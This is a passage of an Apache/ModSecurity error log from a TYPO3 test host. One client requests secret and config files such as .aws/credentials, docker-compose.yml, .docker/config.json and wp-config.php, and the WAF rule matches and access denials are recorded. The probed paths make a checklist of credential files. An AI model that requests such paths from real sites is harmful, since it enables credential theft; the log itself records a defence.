"/db.config"] [unique_id "aDTSWFNfyYOYBczX3ejNEwAAAAo"], referer: http://surf.test.indacotrentino.com/db.config
[Mon May 26 22:43:04.095601 2025] [:error] [pid 3426521] [client 165.1.71.166:44526] [client 165.1.71.166] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/db.config"] [unique_id "aDTSWFNfyYOYBczX3ejNEwAAAAo"], referer: http://surf.test.indacotrentino.com/db.config
[Mon May 26 22:43:04.095794 2025] [:error] [pid 3426521] [client 165.1.71.166:44526] [client 165.1.71.166] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/db.config"] [unique_id "aDTSWFNfyYOYBczX3ejNEwAAAAo"], referer: http://surf.test.indacotrentino.com/db.config
[Mon May 26 22:43:05.319836 2025] [authz_core:error] [pid 3426521] [client 165.1.71.166:44526] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/aws.yml, referer: http://surf.test.indacotrentino.com/aws.yml
[Mon May 26 22:43:05.647403 2025] [authz_core:error] [pid 3426521] [client 165.1.71.166:44526] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/aws.yml, referer: http://surf.test.indacotrentino.com/aws.yml
[Mon May 26 22:43:06.075197 2025] [authz_core:error] [pid 3426521] [client 165.1.71.166:44526] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/aws-secret.yaml, referer: http://surf.test.indacotrentino.com/aws-secret.yaml
[Mon May 26 22:43:06.402616 2025] [authz_core:error] [pid 3426521] [client 165.1.71.166:44526] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/aws-secret.yaml, referer: http://surf.test.indacotrentino.com/aws-secret.yaml
[Mon May 26 22:43:06.830927 2025] [:error] [pid 3426521] [client 165.1.71.166:44526] [client 165.1.71.166] ModSecurity: Warning. Matched phrase ".aws/credentials" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/credentials found within REQUEST_FILENAME: /.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aDTSWlNfyYOYBczX3ejNGgAAAAo"], referer: http://surf.test.indacotrentino.com/.aws/credentials
[Mon May 26 22:43:06.831195 2025] [:error] [pid 3426521] [client 165.1.71.166:44526] [client 165.1.71.166] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aDTSWlNfyYOYBczX3ejNGgAAAAo"], referer: http://surf.test.indacotrentino.com/.aws/credentials
[Mon May 26 22:43:06.831375 2025] [:error] [pid 3426521] [client 165.1.71.166:44526] [client 165.1.71.166] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aDTSWlNfyYOYBczX3ejNGgAAAAo"], referer: http://surf.test.indacotrentino.com/.aws/credentials
[Mon May 26 22:43:07.159419 2025] [:error] [pid 3426521] [client 165.1.71.166:44526] [client 165.1.71.166] ModSecurity: Warning. Matched phrase ".aws/credentials" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/credentials found within REQUEST_FILENAME: /.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aDTSW1NfyYOYBczX3ejNGwAAAAo"], referer: http://surf.test.indacotrentino.com/.aws/credentials
[Mon May 26 22:43:07.159701 2025] [:error] [pid 3426521] [client 165.1.71.166:44526] [client 165.1.71.166] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aDTSW1NfyYOYBczX3ejNGwAAAAo"], referer: http://surf.test.indacotrentino.com/.aws/credentials
[Mon May 26 22:43:07.159896 2025] [:error] [pid 3426521] [client 165.1.71.166:44526] [client 165.1.71.166] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aDTSW1NfyYOYBczX3ejNGwAAAAo"], referer: http://surf.test.indacotrentino.com/.aws/credentials
[Mon May 26 22:43:07.589446 2025] [:error] [pid 3426521] [client 165.1.71.166:44526] [client 165.1.71.166] ModSecurity: Warning. Matched phrase ".aws/config" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/config found within REQUEST_FILENAME: /.aws/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/config"] [unique_id "aDTSW1NfyYOYBczX3ejNHAAAAAo"], referer: http://surf.test.indacotrentino.com/.aws/config
[Mon May 26 22:43:07.589715 2025] [:error] [pid 3426521] [client 165.1.71.166:44526] [client 165.1.71.166] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/config"] [unique_id "aDTSW1NfyYOYBczX3ejNHAAAAAo"], referer: http://surf.test.indacotrentino.com/.aws/config
[Mon May 26 22:43:07.589896 2025] [:error] [pid 3426521] [client 165.1.71.166:44526] [client 165.1.71.166] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/config"] [unique_id "aDTSW1NfyYOYBczX3ejNHAAAAAo"], referer: http://surf.test.indacotrentino.com/.aws/config
[Mon May 26 22:43:07.917245 2025] [:error] [pid 3426521] [client 165.1.71.166:44526] [client 165.1.71.166] ModSecurity: Warning. Matched phrase ".aws/config" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/config found within REQUEST_FILENAME: /.aws/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/config"] [unique_id "aDTSW1NfyYOYBczX3ejNHQAAAAo"], referer: http://surf.test.indacotrentino.com/.aws/config
[Mon May 26 22:43:07.917527 2025] [:error] [pid 3426521] [client 165.1.71.166:44526] [client 165.1.71.166] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/config"] [unique_id "aDTSW1NfyYOYBczX3ejNHQAAAAo"], referer: http://surf.test.indacotrentino.com/.aws/config
[Mon May 26 22:43:07.917717 2025] [:error] [pid 3426521] [client 165.1.71.166:44526] [client 165.1.71.166] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/config"] [unique_id "aDTSW1NfyYOYBczX3ejNHQAAAAo"], referer: http://surf.test.indacotrentino.com/.aws/config
[Mon May 26 22:43:08.347156 2025] [:error] [pid 3426521] [client 165.1.71.166:44526] [client 165.1.71.166] ModSecurity: Warning. Matched phrase ".aws/credentials" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/credentials found within REQUEST_FILENAME: /.aws/credentials.json"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/credentials.json"] [unique_id "aDTSXFNfyYOYBczX3ejNHgAAAAo"], referer: http://surf.test.indacotrentino.com/.aws/credentials.json
[Mon May 26 22:43:08.347445 2025] [:error] [pid 3426521] [client 165.1.71.166:44526] [client 165.1.71.166] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/credentials.json"] [unique_id "aDTSXFNfyYOYBczX3ejNHgAAAAo"], referer: http://surf.test.indacotrentino.com/.aws/credentials.json
[Mon May 26 22:43:08.347636 2025] [:error] [pid 3426521] [client 165.1.71.166:44526] [client 165.1.71.166] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/credentials.json"] [unique_id "aDTSXFNfyYOYBczX3ejNHgAAAAo"], referer: http://surf.test.indacotrentino.com/.aws/credentials.json
[Mon May 26 22:43:08.676684 2025] [:error] [pid 3426521] [client 165.1.71.166:44526] [client 165.1.71.166] ModSecurity: Warning. Matched phrase ".aws/credentials" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/credentials found within REQUEST_FILENAME: /.aws/credentials.json"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/credentials.json"] [unique_id "aDTSXFNfyYOYBczX3ejNHwAAAAo"], referer: http://surf.test.indacotrentino.com/.aws/credentials.json
[Mon May 26 22:43:08.677000 2025] [:error] [pid 3426521] [client 165.1.71.166:44526] [client 165.1.71.166] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/credentials.json"] [unique_id "aDTSXFNfyYOYBczX3ejNHwAAAAo"], referer: http://surf.test.indacotrentino.com/.aws/credentials.json
[Mon May 26 22:43:08.677199 2025] [:error] [pid 3426521] [client 165.1.71.166:44526] [client 165.1.71.166] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/credentials.json"] [unique_id "aDTSXFNfyYOYBczX3ejNHwAAAAo"], referer: http://surf.test.indacotrentino.com/.aws/credentials.json
[Mon May 26 22:43:09.112443 2025] [authz_core:error] [pid 3426521] [client 165.1.71.166:44526] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.aws, referer: http://surf.test.indacotrentino.com/.aws/credentials.yml
[Mon May 26 22:43:09.440236 2025] [authz_core:error] [pid 3426521] [client 165.1.71.166:44526] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.aws, referer: http://surf.test.indacotrentino.com/.aws/credentials.yml
[Mon May 26 22:43:09.868995 2025] [authz_core:error] [pid 3426521] [client 165.1.71.166:44526] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.aws, referer: http://surf.test.indacotrentino.com/.aws/credentials.yaml
[Mon May 26 22:43:10.196274 2025] [authz_core:error] [pid 3426521] [client 165.1.71.166:44526] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.aws, referer: http://surf.test.indacotrentino.com/.aws/credentials.yaml
[Mon May 26 22:43:12.207982 2025] [authz_core:error] [pid 3426521] [client 165.1.71.166:44526] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/docker-compose.yml, referer: http://surf.test.indacotrentino.com/docker-compose.yml
[Mon May 26 22:43:12.535300 2025] [authz_core:error] [pid 3426521] [client 165.1.71.166:44526] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/docker-compose.yml, referer: http://surf.test.indacotrentino.com/docker-compose.yml
[Mon May 26 22:43:12.963773 2025] [authz_core:error] [pid 3426521] [client 165.1.71.166:44526] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/docker-compose.yaml, referer: http://surf.test.indacotrentino.com/docker-compose.yaml
[Mon May 26 22:43:13.290889 2025] [authz_core:error] [pid 3426521] [client 165.1.71.166:44526] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/docker-compose.yaml, referer: http://surf.test.indacotrentino.com/docker-compose.yaml
[Mon May 26 22:43:13.721580 2025] [authz_core:error] [pid 3426521] [client 165.1.71.166:44526] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/docker-compose.dev.yml, referer: http://surf.test.indacotrentino.com/docker-compose.dev.yml
[Mon May 26 22:43:14.048755 2025] [authz_core:error] [pid 3426521] [client 165.1.71.166:44526] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/docker-compose.dev.yml, referer: http://surf.test.indacotrentino.com/docker-compose.dev.yml
[Mon May 26 22:43:14.477894 2025] [authz_core:error] [pid 3426521] [client 165.1.71.166:44526] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/docker-compose.override.yml, referer: http://surf.test.indacotrentino.com/docker-compose.override.yml
[Mon May 26 22:43:14.804894 2025] [authz_core:error] [pid 3426521] [client 165.1.71.166:44526] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/docker-compose.override.yml, referer: http://surf.test.indacotrentino.com/docker-compose.override.yml
[Mon May 26 22:43:15.234214 2025] [:error] [pid 3426521] [client 165.1.71.166:44526] [client 165.1.71.166] ModSecurity: Warning. Matched phrase ".docker/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .docker/ found within REQUEST_FILENAME: /.docker/config.json"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.docker/config.json"] [unique_id "aDTSY1NfyYOYBczX3ejNMAAAAAo"], referer: http://surf.test.indacotrentino.com/.docker/config.json
[Mon May 26 22:43:15.234516 2025] [:error] [pid 3426521] [client 165.1.71.166:44526] [client 165.1.71.166] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.docker/config.json"] [unique_id "aDTSY1NfyYOYBczX3ejNMAAAAAo"], referer: http://surf.test.indacotrentino.com/.docker/config.json
[Mon May 26 22:43:15.234701 2025] [:error] [pid 3426521] [client 165.1.71.166:44526] [client 165.1.71.166] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.docker/config.json"] [unique_id "aDTSY1NfyYOYBczX3ejNMAAAAAo"], referer: http://surf.test.indacotrentino.com/.docker/config.json
[Mon May 26 22:43:15.562187 2025] [:error] [pid 3426521] [client 165.1.71.166:44526] [client 165.1.71.166] ModSecurity: Warning. Matched phrase ".docker/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .docker/ found within REQUEST_FILENAME: /.docker/config.json"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.docker/config.json"] [unique_id "aDTSY1NfyYOYBczX3ejNMQAAAAo"], referer: http://surf.test.indacotrentino.com/.docker/config.json
[Mon May 26 22:43:15.562487 2025] [:error] [pid 3426521] [client 165.1.71.166:44526] [client 165.1.71.166] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.docker/config.json"] [unique_id "aDTSY1NfyYOYBczX3ejNMQAAAAo"], referer: http://surf.test.indacotrentino.com/.docker/config.json
[Mon May 26 22:43:15.562664 2025] [:error] [pid 3426521] [client 165.1.71.166:44526] [client 165.1.71.166] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.docker/config.json"] [unique_id "aDTSY1NfyYOYBczX3ejNMQAAAAo"], referer: http://surf.test.indacotrentino.com/.docker/config.json
[Mon May 26 22:43:15.991242 2025] [:error] [pid 3426521] [client 165.1.71.166:44526] [client 165.1.71.166] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "aDTSY1NfyYOYBczX3ejNMgAAAAo"], referer: http://surf.test.indacotrentino.com/wp-config.php
[Mon May 26 22:43:15.991511 2025] [:error] [pid 3426521] [client 165.1.71.166:44526] [client 165.1.71.166] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "aDTSY1NfyYOYBczX3ejNMgAAAAo"], referer: http://surf.test.indacotrentino.com/wp-config.php
[Mon May 26 22:43:15.991681 2025] [:error] [pid 3426521] [client 165.1.71.166:44526] [client 165.1.71.166] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "aDTSY1NfyYOYBczX3ejNMgAAAAo"], referer: http://surf.test.indacotrentino.com/wp-config.php
[Mon May 26 22:43:16.319241 2025] [:error] [pid 3426521] [client 165.1.71.166:44526] [client 165.1.71.166] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "aDTSZFNfyYOYBczX3ejNMwAAAAo"], referer: http://surf.test.indacotrentino.com/wp-config.php
[Mon May 26 22:43:16.320337 2025] [:error] [pid 3426521] [client 165.1.71.166:44526] [client 165.1.71.166] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "aDTSZFNfyYOYBczX3ejNMwAAAAo"], referer: http://surf.test.indacotrentino.com/wp-config.php
[Mon May 26 22:43:16.320527 2025] [:error] [pid 3426521] [client 165.1.71.166:44526] [client 165.1.71.166] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "aDTSZFNfyYOYBczX3ejNMwAAAAo"], referer: http://surf.test.indacotrentino.com/wp-config.php
[Mon May 26 22:43:18.329690 2025] [authz_core:error] [pid 3426521] [client 165.1.71.166:44526] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/serverless.yml, referer: http://surf.test.indacotrentino.com/serverless.yml
[Mon May 26 22:43:18.656900 2025] [authz_core:error] [pid 3426521] [client 165.1.71.166:44526] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/serverless.yml, referer: http://surf.test.indacotrentino.com/serverless.yml
[Mon May 26 22:43:19.085440 2025] [authz_core:error] [pid 3426521] [client 165.1.71.166:44526] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/serverless.yaml, referer: http://surf.test.indacotrentino.com/serverless.yaml
[Mon May 26 22:43:19.412628 2025] [authz_core:error] [pid 3426521] [client 165.1.71.166:44526] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/serverless.yaml, referer: http://surf.test.indacotrentino.com/serverless.yaml
